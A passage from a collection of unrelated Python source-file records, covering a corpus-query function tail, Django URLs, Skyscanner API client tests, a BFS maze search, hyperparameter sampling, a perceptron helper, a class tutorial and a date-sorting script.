index=['Total'])\n\n # if we're doing files as subcorpora, we can remove the .txt.xml etc\n if isinstance(df, DataFrame) and files_as_subcorpora:\n cname = corpus.name.replace('-stripped', '').replace('-parsed', '')\n edits = [(r'(-[0-9][0-9][0-9])?\\.txt\\.xml', ''),\n (r'-%s(-stripped)?(-parsed)?' % cname, '')]\n from corpkit.editor import editor\n df = editor(df, replace_subcorpus_names=edits).results\n tot = df.sum(axis=1)\n total_total = df.sum().sum()\n\n # sort by total\n if isinstance(df, DataFrame):\n if not df.empty: \n df = df[list(df.sum().sort_values(ascending=False).index)]\n\n # make interrogation object\n locs['corpus'] = corpus.path\n locs = sanitise_dict(locs)\n interro = Interrogation(results=df, totals=tot, query=locs, concordance=conc_df)\n\n # save it\n if save and not kwargs.get('outname'):\n print('\\n')\n interro.save(savename)\n \n goodbye = goodbye_printer(return_it=in_notebook)\n if in_notebook:\n try:\n p.children[2].value = goodbye.replace('\\n', '')\n except AttributeError:\n pass\n signal.signal(signal.SIGINT, original_sigint)\n return interro\n","sub_path":"corpkit/interrogator.py","file_name":"interrogator.py","file_ext":"py","file_size_in_byte":55944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"104756821","text":"from django.conf.urls import url\nfrom django.contrib import admin\n\nfrom .views import (\n\tUserCreateAPIView,\n\tUserLoginAPIView,\n\tActivateAPIView,\n\tActivateListAPIView,\n\t)\n\nurlpatterns = [\n\turl(r'^login/$', UserLoginAPIView.as_view(), name='login'),\n\turl(r'^register/$', UserCreateAPIView.as_view(), name='register'),\n\turl(r'^activate/list/(?P[\\w-]+)/$', ActivateAPIView.as_view(), name='activate'),\n\turl(r'^activate/list/$', ActivateListAPIView.as_view(), 
name='activate_list'),\n]\n","sub_path":"employeerest/company2/accounts/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"112822746","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\ntest_skyscanner\n----------------------------------\n\nTests for `skyscanner` module.\n\"\"\"\n\nimport unittest\nimport json\nfrom datetime import datetime, timedelta\nfrom requests import HTTPError\n\nfrom skyscanner.skyscanner import (Flights, Transport, FlightsCache, CarHire, Hotels,\n EmptyResponse, ResponseError, STRICT, GRACEFUL, IGNORE)\n\n\nclass SkyScannerTestCase(unittest.TestCase):\n \"\"\"Generic TestCase class to support default failure messages.\"\"\"\n\n def setUp(self):\n self.api_key = 'prtl6749387986743898559646983194'\n self.result = None\n\n def tearDown(self):\n self.result = None\n\n def assertTrue(self, expr, msg=None):\n default_message = ('API Response: %s' % self.result) if self.result else None\n super(SkyScannerTestCase, self).assertTrue(expr, msg=msg or default_message)\n\n\nclass FakeResponse(object):\n\n def __init__(self, status_code=200, content=None):\n self.content = content or ''\n self.status_code = status_code\n\n def json(self):\n return json.loads(self.content)\n\n\nclass TestTransport(SkyScannerTestCase):\n\n def test_create_session(self):\n with self.assertRaises(NotImplementedError):\n Transport(self.api_key).create_session()\n\n def test_with_error_handling_strict(self):\n with self.assertRaises(RuntimeError):\n Transport._with_error_handling(FakeResponse(), RuntimeError, STRICT)\n\n with self.assertRaises(HTTPError):\n Transport._with_error_handling(FakeResponse(status_code=404), HTTPError(), STRICT)\n\n with self.assertRaises(HTTPError) as e:\n Transport._with_error_handling(FakeResponse(status_code=429), HTTPError('429: '), STRICT)\n self.assertEqual(e.message, '429: Too many requests in the 
last minute.')\n\n with self.assertRaises(HTTPError) as e:\n Transport._with_error_handling(FakeResponse(status_code=400), HTTPError('400'), STRICT)\n self.assertEqual(e.message, '400')\n\n with self.assertRaises(HTTPError) as e:\n Transport._with_error_handling(FakeResponse(status_code=400,\n content='{\"ValidationErrors\": '\n '[{\"Message\": \"1\"}, {\"Message\": \"2\"}]}'),\n HTTPError('400'), STRICT)\n self.assertEqual(e.message, '400: %s' % '\\n\\t'.join(['1', '2']))\n\n def test_with_error_handling_graceful(self):\n result = Transport._with_error_handling(FakeResponse(), EmptyResponse(), GRACEFUL)\n self.assertIsNone(result)\n\n result = Transport._with_error_handling(FakeResponse(content='{\"valid\": 1}', status_code=429),\n HTTPError(), GRACEFUL)\n self.assertIsNotNone(result)\n self.assertTrue('valid' in result)\n self.assertEqual(result['valid'], 1)\n\n result = Transport._with_error_handling(FakeResponse(content='invalid', status_code=429),\n HTTPError(), GRACEFUL)\n self.assertIsNone(result)\n\n with self.assertRaises(HTTPError):\n Transport._with_error_handling(FakeResponse(), HTTPError(), GRACEFUL)\n with self.assertRaises(RuntimeError):\n Transport._with_error_handling(FakeResponse(), RuntimeError(), GRACEFUL)\n\n def test_with_error_handling_ignore(self):\n result = Transport._with_error_handling(FakeResponse(), EmptyResponse(), IGNORE)\n self.assertIsNone(result)\n result = Transport._with_error_handling(FakeResponse(), RuntimeError(), IGNORE)\n self.assertIsNone(result)\n result = Transport._with_error_handling(FakeResponse(), HTTPError(), IGNORE)\n self.assertIsNone(result)\n\n result = Transport._with_error_handling(FakeResponse(content='{\"valid\": 1}'), HTTPError(), IGNORE)\n self.assertIsNotNone(result)\n self.assertTrue('valid' in result)\n self.assertEqual(result['valid'], 1)\n\n def test_default_resp_callback(self):\n with self.assertRaises(EmptyResponse):\n Transport._default_resp_callback(None)\n with self.assertRaises(EmptyResponse):\n 
Transport._default_resp_callback(FakeResponse(content=''))\n\n with self.assertRaises(ValueError):\n Transport._default_resp_callback(FakeResponse(content='invalid json'))\n\n with self.assertRaises(ResponseError) as e:\n Transport._default_resp_callback(FakeResponse(content='{\"errors\": [\"Wrong API key\", \"Another error\"]}'))\n self.assertEqual(e.message, '\\n\\t%s' % '\\n\\t'.join(['Wrong API key', 'Another error']))\n\n resp_json = Transport._default_resp_callback(FakeResponse(content='{\"valid\": 1}'))\n self.assertIsNotNone(resp_json)\n self.assertTrue('valid' in resp_json)\n self.assertEqual(resp_json['valid'], 1)\n\n\nclass TestCarHire(SkyScannerTestCase):\n\n def setUp(self):\n # API Key that's meant for testing only\n # Taken from: http://business.skyscanner.net/portal/en-GB/Documentation/FlightsLivePricingQuickStart\n super(TestCarHire, self).setUp()\n datetime_format = '%Y-%m-%dT%H:%S'\n pickup_datetime = datetime.now()\n dropoff_datetime = pickup_datetime + timedelta(days=3)\n self.pickup = pickup_datetime.strftime(datetime_format)\n self.dropoff = dropoff_datetime.strftime(datetime_format)\n\n def test_location_autosuggest(self):\n carhire_service = CarHire(self.api_key)\n\n self.result = carhire_service.location_autosuggest(\n market='UK',\n currency='GBP',\n locale='en-GB',\n query='Kuala')\n\n self.assertTrue('results' in self.result)\n self.assertTrue(len(self.result['results']) > 0)\n\n def test_get_result(self):\n \"\"\"\n http://partners.api.skyscanner.net/apiservices/carhire/liveprices/v2/{market}/{currency}/{locale}/{pickupplace}/{dropoffplace}/{pickupdatetime}/{dropoffdatetime}/{driverage}?apiKey={apiKey}&userip={userip}\n YYYY-MM-DDThh:mm\n \"\"\"\n carhire_service = CarHire(self.api_key)\n\n self.result = carhire_service.get_result(\n market='UK',\n currency='GBP',\n locale='en-GB',\n pickupplace='LHR-sky',\n dropoffplace='LHR-sky',\n pickupdatetime=self.pickup,\n dropoffdatetime=self.dropoff,\n driverage='30',\n 
userip='175.156.244.174')\n\n self.assertTrue('cars' in self.result)\n self.assertTrue('websites' in self.result)\n\n def test_create_session(self):\n \"\"\"\n http://partners.api.skyscanner.net/apiservices/carhire/liveprices/v2/{market}/{currency}/{locale}/{pickupplace}/{dropoffplace}/{pickupdatetime}/{dropoffdatetime}/{driverage}?apiKey={apiKey}&userip={userip}\n YYYY-MM-DDThh:mm\n \"\"\"\n carhire_service = CarHire(self.api_key)\n\n poll_url = carhire_service.create_session(\n market='UK',\n currency='GBP',\n locale='en-GB',\n pickupplace='LHR-sky',\n dropoffplace='LHR-sky',\n pickupdatetime=self.pickup,\n dropoffdatetime=self.dropoff,\n driverage='30',\n userip='175.156.244.174')\n\n self.assertTrue(poll_url)\n\n\nclass TestHotels(SkyScannerTestCase):\n\n def setUp(self):\n # API Key that's meant for testing only\n # Taken from: http://business.skyscanner.net/portal/en-GB/Documentation/FlightsLivePricingQuickStart\n super(TestHotels, self).setUp()\n datetime_format = '%Y-%m-%d'\n checkin_datetime = datetime.now()\n checkout_datetime = checkin_datetime + timedelta(days=4)\n self.checkin = checkin_datetime.strftime(datetime_format)\n self.checkout = checkout_datetime.strftime(datetime_format)\n\n def test_location_autosuggest(self):\n hotels_service = Hotels(self.api_key)\n\n self.result = hotels_service.location_autosuggest(\n market='UK',\n currency='GBP',\n locale='en-GB',\n query='Kuala')\n\n self.assertTrue('results' in self.result)\n self.assertTrue(len(self.result['results']) > 0)\n\n def test_get_result(self):\n \"\"\"\n http://partners.api.skyscanner.net/apiservices/carhire/liveprices/v2/{market}/{currency}/{locale}/{pickupplace}/{dropoffplace}/{pickupdatetime}/{dropoffdatetime}/{driverage}?apiKey={apiKey}&userip={userip}\n YYYY-MM-DDThh:mm\n \"\"\"\n\n hotels_service = Hotels(self.api_key)\n self.result = hotels_service.get_result(\n market='UK',\n currency='GBP',\n locale='en-GB',\n entityid=27543923,\n checkindate=self.checkin,\n 
checkoutdate=self.checkout,\n guests=1,\n rooms=1)\n\n self.assertTrue('hotels' in self.result)\n self.assertTrue(len(self.result['hotels']) > 0)\n\n def test_create_session(self):\n \"\"\"\n http://partners.api.skyscanner.net/apiservices/carhire/liveprices/v2/{market}/{currency}/{locale}/{pickupplace}/{dropoffplace}/{pickupdatetime}/{dropoffdatetime}/{driverage}?apiKey={apiKey}&userip={userip}\n YYYY-MM-DDThh:mm\n \"\"\"\n hotels_service = Hotels(self.api_key)\n\n poll_url = hotels_service.create_session(\n market='UK',\n currency='GBP',\n locale='en-GB',\n entityid=27543923,\n checkindate=self.checkin,\n checkoutdate=self.checkout,\n guests=1,\n rooms=1)\n\n self.assertTrue(poll_url)\n\n\nclass TestFlights(SkyScannerTestCase):\n\n def setUp(self):\n # API Key that's meant for testing only\n # Taken from: http://business.skyscanner.net/portal/en-GB/Documentation/FlightsLivePricingQuickStart\n super(TestFlights, self).setUp()\n datetime_format = '%Y-%m'\n outbound_datetime = datetime.now()\n inbound_datetime = outbound_datetime + timedelta(days=31)\n self.outbound = outbound_datetime.strftime(datetime_format)\n self.inbound = inbound_datetime.strftime(datetime_format)\n\n datetime_format = '%Y-%m-%d'\n inbound_datetime = outbound_datetime + timedelta(days=3)\n self.outbound_days = outbound_datetime.strftime(datetime_format)\n self.inbound_days = inbound_datetime.strftime(datetime_format)\n\n def test_get_cheapest_quotes(self):\n flights_cache_service = FlightsCache(self.api_key)\n self.result = flights_cache_service.get_cheapest_quotes(\n country='UK',\n currency='GBP',\n locale='en-GB',\n originplace='SIN-sky',\n destinationplace='KUL-sky',\n outbounddate=self.outbound,\n inbounddate=self.inbound)\n\n self.assertTrue('Quotes' in self.result)\n self.assertTrue(len(self.result['Quotes']) > 0)\n\n # I'm getting the following result:\n # {u'ValidationErrors': [{u'Message': u'For this query please use the following service [BrowseDates]'}]}\n def 
test_get_cheapest_price_by_route(self):\n flights_cache_service = FlightsCache(self.api_key)\n self.result = flights_cache_service.get_cheapest_price_by_route(\n country='UK',\n currency='GBP',\n locale='en-GB',\n originplace='SIN-sky',\n destinationplace='KUL-sky',\n outbounddate=self.outbound,\n inbounddate=self.inbound)\n\n print(\"result: %s\" % self.result)\n\n def test_get_cheapest_price_by_date(self):\n flights_cache_service = FlightsCache(self.api_key)\n self.result = flights_cache_service.get_cheapest_price_by_date(\n country='UK',\n currency='GBP',\n locale='en-GB',\n originplace='SIN-sky',\n destinationplace='KUL-sky',\n outbounddate=self.outbound,\n inbounddate=self.inbound)\n\n self.assertTrue('Quotes' in self.result)\n self.assertTrue(len(self.result['Quotes']) > 0)\n\n def test_get_grid_prices_by_date(self):\n flights_cache_service = FlightsCache(self.api_key)\n self.result = flights_cache_service.get_grid_prices_by_date(\n country='UK',\n currency='GBP',\n locale='en-GB',\n originplace='SIN-sky',\n destinationplace='KUL-sky',\n outbounddate=self.outbound,\n inbounddate=self.inbound)\n\n self.assertTrue('Dates' in self.result)\n self.assertTrue(len(self.result['Dates']) > 0)\n\n def test_create_session(self):\n flights_service = Flights(self.api_key)\n poll_url = flights_service.create_session(\n country='UK',\n currency='GBP',\n locale='en-GB',\n originplace='SIN-sky',\n destinationplace='KUL-sky',\n outbounddate=self.outbound_days,\n inbounddate=self.inbound_days,\n adults=1)\n\n self.assertTrue(poll_url)\n\n def test_get_markets(self):\n transport = Transport(self.api_key)\n self.result = transport.get_markets('en-GB')\n\n self.assertTrue('Countries' in self.result)\n self.assertTrue(len(self.result['Countries']) > 0)\n\n def test_location_autosuggest(self):\n transport = Transport(self.api_key)\n self.result = transport.location_autosuggest('KUL', 'UK', 'GBP', 'en-GB')\n\n self.assertTrue('Places' in self.result)\n 
self.assertTrue(len(self.result['Places']) > 0)\n\n # def test_poll_session(self):\n # flights_service = Flights(self.api_key)\n\n # poll_url = flights_service.create_session(\n # country='UK',\n # currency='GBP',\n # locale='en-GB',\n # originplace='SIN-sky',\n # destinationplace='KUL-sky',\n # outbounddate='2015-05-28',\n # inbounddate='2015-05-31',\n # adults=1)\n\n # result = flights_service.poll_session(poll_url, sorttype='carrier')\n\n # self.assertTrue(len(result['Itineraries']) > 0)\n\n # pass\n\n # def test_request_booking_details(self):\n # flights_service = Flights(self.api_key)\n\n # poll_url = flights_service.create_session(\n # country='UK',\n # currency='GBP',\n # locale='en-GB',\n # originplace='SIN-sky',\n # destinationplace='KUL-sky',\n # outbounddate='2015-05-28',\n # inbounddate='2015-05-31',\n # adults=1)\n\n # flights_results = flights_service.poll_session(poll_url, sorttype='carrier')\n\n # print(flights_results)\n\n # itinerary = flights_results['Itineraries'][0]\n\n # result = flights_service.request_booking_details(poll_url, outboundlegid=itinerary['OutboundLegId'],\n # inboundlegid=itinerary['InboundLegId'])\n\n # print(result)\n\n # pass\n\n def test_get_result(self):\n flights_service = Flights(self.api_key)\n self.result = flights_service.get_result(\n country='UK',\n currency='GBP',\n locale='en-GB',\n originplace='SIN-sky',\n destinationplace='KUL-sky',\n outbounddate=self.outbound_days,\n inbounddate=self.inbound_days,\n adults=1)\n\n # print(result)\n print(\"status: %s\" % self.result['Status'])\n # self.assertTrue(len(result['Flights']['Itineraries']) > 0)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/test_skyscanner.py","file_name":"test_skyscanner.py","file_ext":"py","file_size_in_byte":15612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"403834785","text":"# search.py\n# ---------------\n# Licensing Information: You are free to use or extend 
this projects for\n# educational purposes provided that (1) you do not distribute or publish\n# solutions, (2) you retain this notice, and (3) you provide clear\n# attribution to the University of Illinois at Urbana-Champaign\n#\n# Created by Jongdeog Lee (jlee700@illinois.edu) on 09/12/2018\n\n\"\"\"\nThis file contains search functions.\n\"\"\"\n# Search should return the path and the number of states explored.\n# The path should be a list of tuples in the form (alpha, beta, gamma) that correspond\n# to the positions of the path taken by your search algorithm.\n# Number of states explored should be a number.\n# maze is a Maze object based on the maze from the file specified by input filename\n# searchMethod is the search method specified by --method flag (bfs,astar)\n# You may need to slight change your previous search functions in MP1 since this is 3-d maze\n\nfrom collections import deque\nfrom heapq import heappop, heappush\nfrom queue import Queue\n\ndef search(maze, searchMethod):\n return {\n \"bfs\": bfs,\n }.get(searchMethod, [])(maze)\n\ndef bfs(maze):\n # Write your code here\n \"\"\"\n This function returns optimal path in a list, which contains start and objective.\n If no path found, return None.\n \"\"\"\n q = Queue() #init queue\n v = set() #init visited nodes\n prev = {} #init previous nodes (dictionary)\n\n start = maze.getStart() #alpha beta\n #dot = maze.getObjectives() #list of objectives in alpha beta\n #destination = dot[0]\n\n path = []\n found = 0\n\n q.put(start)\n v.add(start)\n\n while q.empty() == False:\n current = q.get()\n\n if maze.isObjective(current[0],current[1]):\n found = 1 ;\n destination = current\n break\n\n for neighbor in maze.getNeighbors(current[0], current[1]):\n if neighbor not in v:\n q.put(neighbor)\n v.add(neighbor)\n prev[neighbor] = current\n\n #backtrace\n if found ==0:\n print(\"path not found\")\n return\n\n path.append(destination)\n while destination in prev:\n path.append(prev[destination])\n destination = 
prev[destination]\n\n path.reverse()\n\n print(\"path found\")\n return path\n","sub_path":"mp2/template/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":2365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"453000609","text":"import pandas as pd\nimport numpy as np\nimport random\nfrom keras.models import Sequential\nfrom xgboost import XGBRegressor\nfrom src.models.time_series import StepTimeSeriesModel\nfrom src.models.ensembler import Ensembler\n\n\nclass RandomSearch(object):\n def __init__(self, model=None, sampling_space=None):\n assert model is not None or sampling_space is not None\n assert model is None or sampling_space is None\n if sampling_space is not None:\n self.sampling_space = sampling_space\n self.sample_model = self.sample_custom()\n elif model == StepTimeSeriesModel:\n self.sample_model = self.sample_nsm\n elif model == Ensembler:\n self.sample_model = self.sample_ensembler\n elif model == XGBRegressor:\n self.sample_model = self.sample_xgbregressor\n elif model == Sequential:\n self.sample_model = self.sample_lstm\n \n def sample_space(self, T):\n parameter_space = pd.DataFrame([self.sample_model() for _ in range(T)])\n return parameter_space\n \n def sample_custom(self):\n return self.sampling_space\n\n def sample_nsm(self):\n parameter_space = {\n 'n': 72,\n 'd': random.choice(range(4, 50))\n }\n return parameter_space\n\n def sample_ensembler(self):\n importances = random.sample(range(100), 3)\n models = ['xgboost', 'knn', 'lasso']\n parameter_space = {\n 'importances': {model: i/sum(importances) \n for model, i in zip(models, importances)},\n }\n return parameter_space\n\n def sample_xgbregressor(self):\n parameter_space = {\n 'learning_rate': random.choice(np.geomspace(1e-2, 1)),\n 'max_depth': random.choice(range(1, 10)),\n 'gamma': random.choice(np.geomspace(1e-2, 1)),\n 'min_child_weight': random.choice(range(1, 10)),\n 'num_estimators': 
random.choice(range(30, 300)),\n 'reg_alpha': random.choice(np.linspace(0.2, 1)),\n 'reg_lambda': random.choice(np.linspace(0.2, 2)),\n 'scale_pos_weight': random.choice(np.linspace(0.3, 2)),\n }\n return parameter_space\n\n def sample_lstm(self):\n parameter_space = {\n 'learning_rate': random.choice(np.geomspace(1e-2, 1)),\n 'dropout': random.choice(np.geomspace(.5e-2, 1)),\n 'recurrent_dropout': random.choice(np.geomspace(.5e-2, 1)),\n 'hidden_units': random.choice(range(10, 300)),\n }\n return parameter_space\n\n","sub_path":"src/models/random_search.py","file_name":"random_search.py","file_ext":"py","file_size_in_byte":2578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"185242455","text":"from django.urls import path\n\nfrom . import views\napp_name = \"favorites_app\"\n\nurlpatterns = [\n path(\n 'profile',\n views.UserPageView.as_view(),\n name='profile', \n ),\n path(\n 'add-entry//',\n views.AddFavoritesView.as_view(),\n name='add-favorites', \n ),\n path(\n 'delete-favorites/?/', \n views.FavoritesDeleteView.as_view(),\n name='delete-favorites',\n ),\n]","sub_path":"applications/favorites/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"36116451","text":"import pandas_datareader as pdr\nimport numpy as np\nfrom sklearn.preprocessing import MinMaxScaler\n\ndef get_data(seq_len = 32):\n df = pdr.DataReader('F',data_source='yahoo' ,start='2012-01-01', end='2021-05-1')\n \n df.drop('Volume',axis=1,inplace=True)\n \n scaler = MinMaxScaler(feature_range=(0,1))\n #df[df.columns] = scaler.fit_transform(df) \n df=df[['High','Low','Open','Adj Close','Close']]\n\n '''Create training, validation and test split'''\n\n times = sorted(df.index.values)\n last_10pct = sorted(df.index.values)[-int(0.1*len(times))] # Last 10% of series\n last_20pct = 
sorted(df.index.values)[-int(0.2*len(times))] # Last 20% of series\n\n df_train = df[(df.index < last_20pct)] # Training data are 80% of total data\n df_val = df[(df.index >= last_20pct) & (df.index < last_10pct)]\n df_test = df[(df.index >= last_10pct)]\n\n train_data = df_train.values\n val_data = df_val.values\n test_data = df_test.values\n print('Training data shape: {}'.format(train_data.shape))\n print('Validation data shape: {}'.format(val_data.shape))\n print('Test data shape: {}'.format(test_data.shape))\n train_data_len=len(train_data)\n val_data_len=len(train_data)+len(val_data)\n\n # Training data\n X_train, y_train = [], []\n for i in range(seq_len, len(train_data)):\n X_train.append(train_data[i-seq_len:i]) # Chunks of training data with a length of 128 df-rows\n y_train.append(train_data[:, 4][i]) # Value of 4th column (Close Price) of df-row 128+1\n X_train, y_train = np.array(X_train), np.array(y_train)\n \n # Validation data\n X_val, y_val = [], []\n for i in range(seq_len, len(val_data)):\n X_val.append(val_data[i-seq_len:i])\n y_val.append(val_data[:, 4][i])\n X_val, y_val = np.array(X_val), np.array(y_val)\n \n # Test data\n X_test, y_test = [], []\n for i in range(seq_len, len(test_data)):\n X_test.append(test_data[i-seq_len:i])\n y_test.append(test_data[:, 4][i]) \n X_test, y_test = np.array(X_test), np.array(y_test)\n \n print('Training set shape', X_train.shape, y_train.shape)\n print('Validation set shape', X_val.shape, y_val.shape)\n print('Testing set shape' ,X_test.shape, y_test.shape)\n \n return df, X_train, y_train, X_val, y_val, X_test, y_test,train_data_len,val_data_len,scaler","sub_path":"Deployment/utils/get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":2341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"142071283","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 15 14:51:14 2018\n\n@author: 
panzengyang\n\"\"\"\nimport numpy as np\nimport msg2matrix as mx\nfrom sklearn.linear_model import Perceptron\nfrom sklearn.model_selection import KFold\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n\ndef CrossValid_percep(eta, X, Y): #trainmsg, trainresult ALL\n Rcv = 0\n numsplit = 2\n kf = KFold(n_splits = numsplit)\n for train_index, test_index in kf.split(X):\n train_result, val_result = Y[train_index], Y[test_index]\n train_msg, val_msg = X[train_index], X[test_index]\n \n vectorizer = TfidfVectorizer(max_df = 0.35, min_df = 5, max_features = 500, sublinear_tf = True)\n vectorizer.fit(train_msg)\n dictionary = vectorizer.get_feature_names()\n \n train_matrix = mx.extract_features(train_msg, dictionary)\n val_matrix = mx.extract_features(val_msg, dictionary)\n \n per = Perceptron(max_iter = 1, eta0 = eta, class_weight = \"balanced\")\n per.fit(train_matrix, train_result)\n \n Rcv = Rcv + (1 - per.score(val_matrix, val_result))\n Rcv = Rcv/numsplit\n print(\"eta = \", eta, \" Rvc = \", Rcv)\n return Rcv\n \n\ndef percep_cv(list_eta, X, Y): #trainmsg, trainresult ALL\n Rcv = []\n for i, eta in enumerate(list_eta):\n Rcv.append(CrossValid_percep(eta, X, Y))\n index_min = np.argmin(Rcv)\n eta = list_eta[index_min]\n print(\"Correct eta = \", eta)\n \n return eta","sub_path":"Perceptron_cv.py","file_name":"Perceptron_cv.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"521451515","text":"#!/usr/bin/python3.5 \n\n# I. \n# Class \n''' \n Class: \n Class is a kind of factories to manufacture instances. \n \n [Note] \n 1. Calling a class object like a function makes new instance object. \n\n 2. Each instance inherits class attributes and get its own namespace. \n\n 3. Assignments to attributes of self in methods make per-instance attributes. \n Inside the class's method funtion, the first argument \"self\" references the instance object being processed. 
\n Assignments to attributes of self create or change data in instance not the class. \n\n''' \n# First example \nclass FirstClass():\n def setdata(self,value): \n self.data = value \n def display(self): \n print(self.data) \n\n# Create different namespaces, or different instance. Both inherits the FirstClass. \nx = FirstClass() \ny = FirstClass() \n\nx.setdata(\"Caeser\") \ny.setdata(3.14159) \n\nx.display() \ny.display() \n\n# Change instance attribute outside the class by assigning to self in method. \nx.data = \"Assign outside the class\" \nx.display() \n# Create new attributes outside the class's method function by assignment to self. \n# The new attributes are with instance if assign it to instace, i.e. class has no this new attributes. \ny.CreateNewValueOutsideClass = 'Create New Value Outside the Class' \nprint(y.CreateNewValueOutsideClass) \n#print(FirstClass.CreateNewValueOutsideClass) # This may lead to error, because the new attributes are created in instance's namespace.\n\n''' \n [Note]\n 1. Classes usually create all of the instance's attributes by assigment to the self argument. \n 2. The argument self means the instance itself. \n 3. The instance can create new attributes outside the class's method function by assigment to self, which cannot called from class. \n i.e. Object.NewVariable = 100, where .NewVariable is not defined in the class. \n 4. The class can also create new attributes outside class with assignment to self. \n This created attributes automatically inherit by subclass and can be called by instances. \n''' \n\n# II. \n''' \n Class:\n Classes are customized by inheritance. \n\n [Note] \n 1. Superclass are listed in parenthese in a class header. \n 2. Classes inherit attributes from their superclass. \n 3. Instances inherit attributes from all accessible classes. \n Each instance gets names from the class it is generated from, ae well as all of that class's superclass. 
\n When looking for a name, Python checks the instance, then its class, the all superclass. \n 4. Each object.attribute reference invokes a new, independent search. \n 5. Logic changes are made by subclassing, not by changing superclass. \n''' \n\n# Second Example \nclass SecondClass(FirstClass): \n def display(self): \n # By definning attribute with same name in FirstClass, SecondClass' display overrides the attribute in FirstClass. \n # Searching attributes stops by first appearance of the name that it finds. \n print(\"Current value = '%s'\"%(self.data)) \n\nz = SecondClass() \nz.setdata(\"Inheritance of the attribute setdata.\") # Inherit the attribute setdata from superclass FirstClass. \nz.display() # Override the attribute in FirstClass. \nx.display() # x is still odd value. \n''' \n Class are attributes in Modules\n\n $ import modulename # or from modulename import FirstClass \n $ class SecondClass( modulename.FirstClass ): \n $ def function_name(self): \n $ .... \n \n [Note] \n 1. Where modulname and class name can be the same. i.e. abc.abc(),\n 2. class name should begin with an uppercase letter conventionally. i.e. abc.Abc() \n\n''' \n\n# III. Operator overloading \n''' \n Classes can intercept Python operators. \n Operator overloading is that let the objects coded with classes intercept and respond to operations that work on build-in type: \n addition, slicing, printing, qualification and so on. \n Operator overloading lets objects be more tightly integrated with Python's object model and makes classes like build-in. \n\n [Note] \n 1. Methods named with double underscores are special, i.e. __X__ \n This spacial method is implemented on operator overloading. \n Python classes define a fixed and unchangeable mapping from each of these operations. \n 2. Such methods are called automatically when instances appear in built-in operation. \n If an instance object inherits an __add__ method, that method is called whenever the object appears in a + expression. 
\n 3. Classes may override most built-in type operation. \n 4. If a class doesn't define or inherit an operator overloading methods, \n it just means that the corresponding operation is not supported for the class's instances. \n i.e. If there is no __add__, + expression raise exception. \n \n [Note] \n __init__ method, which is known as the constructor method and used to initiailize object's state, which is optional. \n \n''' \n# Third Example with operator overloading. \nclass ThirdClass( SecondClass ): \n def __init__(self,value): \n self.data = value \n\n def __add__(self, other): # Called if + expression appears. \n #return self.data+other # Just return a objects of self.data+other \n return ThirdClass(self.data+other) # Return an instance of ThirdClass. \n\n def __str__(self): # Called if print() appears. \n return \"[ThirdClass: %s]\"%self.data \n\n def mul(self,other): \n self.data *= other \n\n\na = ThirdClass('abc') \na.display() # Inherit from FirstClass, because .display appears first at FirstClass. \nprint(a) # Call the __str__ method. \nb = a+'xyz' \n''' \n .__add__(self,other):\n ^ ^\n  | | \n | |\n a + 'xyz' \n\n return ThirdClass( self.data + other ) \n ^ ^ \n | | \n | | \n 'abc' 'xyz' -----> Initialize another instance of ThirdClass with 'abcxyz' \n\n''' \nb.display() # __add__ makes a new instance that has all ThirdClass attributes. \nprint(b) \n\na.mul(3) \nprint(a) \n\n\n# Other example \nclass rec: \n pass # An empty namespace \n\n\nrec.name = 'Bob' \nrec.age = 40 \nprint(rec.name) \n''' \n Above works even though there is no instance of the class yet. \n Classes are objects in their own right, even without instances. \n For those attributes defined outside the class can be called by their instances. \n''' \n\nx = rec() \ny = rec()\nprint( x.name, y.name ) # Because of add new attribute above. \n\nx.name = 'Sue' \nprint( x.name, y.name ) # x is another namespace. 
\n''' \n Actually, the attributes of a namespace objects are usually implemented as dictionary. \n''' \n\n\ndef uppername(obj): \n # Simple define a function with receiving a class object as argument. \n return obj.name.upper() \n\nprint( uppername(x) ) \n\nrec.method_created_outside_class = uppername # Create new method outside the class \n\nprint(x.method_created_outside_class()) \nprint(y.method_created_outside_class()) \nprint(rec.method_created_outside_class(x))\n''' \n [Note] \n New method can be created ouside the class, which is the same with new name created outside the class. \n''' \n\n# Another example inherits rec class \npers1 = rec() \npers1.name = 'Bob' \npers1.job = ['dev','msg'] \npers1.age = 40 \n\npers2 = rec() \npers2.name = 'Sue' \npers2.job = ['dev','cto'] \nprint(pers1.name, pers2.name) \n\n# Class implement \nclass Person():\n def __init__(self, name, jobs, age = None ):\n self.name = name \n self.jobs = jobs \n self.age = age \n def info(self): \n return (self.name, self.jobs) \n\nrec1 = Person('Bob',['dev','mgr'],40.5) \nrec2 = Person('Sue',['dev','cto']) \n\nprint(rec1.jobs, rec2.info()) \n\n\n","sub_path":"LearningPython/example_Class_1.py","file_name":"example_Class_1.py","file_ext":"py","file_size_in_byte":7998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"540229935","text":"from datetime import datetime\n\nz = int(input())\ntuples = []\nfor i in range(z):\n line = input()\n s = line.split(\" \")\n date = s[0]\n time = s[1]\n message = \"\"\n for x in range(2, len(s)):\n if x != 2: \n message = message + \" \"\n message = message + s[x]\n\n d = s[0] + \" \" + s[1]\n tuples.append((datetime.strptime(d, '%d.%m.%Y %H:%M'), message))\n\ntuples.sort(key=lambda x: x[0])\n\nfor i in tuples:\n print (i[0].strftime('%d.%m.%4Y 